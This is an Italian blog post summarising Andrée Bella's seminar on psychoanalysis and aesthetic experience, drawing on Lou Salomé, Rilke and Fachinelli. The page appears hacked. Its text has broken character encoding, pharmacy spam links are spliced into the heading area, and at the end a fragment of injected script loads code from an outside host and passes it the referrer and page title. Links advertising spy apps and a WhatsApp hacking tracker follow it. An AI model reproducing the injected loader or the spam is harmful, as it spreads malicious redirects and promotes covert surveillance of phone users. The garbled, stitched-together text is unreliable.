Pagine

Archivi

Meta

BDF 7.10 a�� AndrA�e Bella: Psicoanalisi della��esperienza estetica: una traccia eterodossa

 

AndrA�e Bella http://fulfillmentservicesco.com/list-of-antidepressant-drugs-2016-camaro/ Pills online “Psicoanalisi della��esperienza estetica: una traccia eterodossa”

 

 

Cheap Buy Cheap

 

 
purchase rosuvastatin 5mg

Nel suo ricco seminario AndrA�e Bella si interroga su che senso possa avere il mettere in dialogo psicoanalisi e letteratura. Entrambe le discipline, infatti, sembrano interrogarsi, alimentarsi e vicendevolmente compenetrarsi: si pensi, solo per citare un esempio, ai fini intrecci delle produzioni dostoevskijana e freudiana. Il lavoro che presenta AndrA�e Bella A? come un cammino in fieri, tra psicoanalisi e letteratura; A? eterodosso poichA�, aggiunge Bella, si giustappongono autori assai differenti tra loro, per esempio Lou von SalomA�, Elvio Fachinelli, Rilke. E Bella ci ricorda, in proposito, che SalomA� stessa era sia scrittrice sia psicoanalista: SalomA� utilizzava le opere letterarie nel tentativo “di entrarci dentro, di ragionarci sopra e di vedere che cosa farne psicoanaliticamente”. A? a questo punto che emerge un tema chiave: il rapporto vita-arte e artista-arte; A? questa una delle innumerevoli questioni esplorate da SalomA�: l’arte come ponte tra ragione, intesa come coscienza, e l’essere vivente, per permettere una comunicazione tra sA� e il mondo. Di qui il disinteresse per l’arte sfocia in disinteresse per la nostra interioritA�. Sembrano innestarsi, su questo punto, le Elegie di Rilke: AndrA�e Bella ci ricorda che per Rilke il senso dell’arte A? convertire la gioia, ossia riuscire ad attraversare la condizione umana di fragilitA�, riuscire a “cantare la vita” nonostante la fragilitA� costitutiva della vita. Dunque Bella fa emergere altre parole chiave: la caducitA� della vita, il rimpianto, il lutto, tuttavia ognuna lungo un continuum, entro un’idea di attraversamento nel e con l’arte: si affiancano quindi vita, amore, senso e condivisione. Intorno a questi temi Bella ricorda Fachinelli: l’insostituibilitA� di ciA? che era vivo rende l’esperienza umana irriducibilmente abitata dalla ferita; ma il poeta, nel momento in cui riesce a cantare la vita, A? in grado di salvare la natura, la vita stessa. Sembra, questo, un atteggiamento sia etico sia religioso, ci ricorda Bella. Gli echi di Rilke sembrano illuminare, ancora, la questione tra felicitA� e attraversamento: per Rilke, afferma Bella, la felicitA� A? intesa anche come discesa, non solo come ascensione e mera performance quantitativa. La felicitA� sembra convertita in attraversamento, in un dare senso profondo e concreto: A? l’accettazione della mortalitA� come inscindibile dal continuum con la vita. Qui giunge la conversione della gioia in attraversamento. Gli intrecci tra psicoanalisi e letteratura, ricorda AndrA�e Bella, sembrerebbero aiutare le persone nell’attraversamento della sofferenza: attraversamento non inteso come nascondimento o evitamento, bensA� come costruzione di senso, in grado, forse, di salvare la crudeltA� del mondo dalla sua stessa natura ferale.

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; Purchase oxytrol patch cheap online https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.http://prosiec.cl/facebook-tracker-whatsapp-hack-phonty/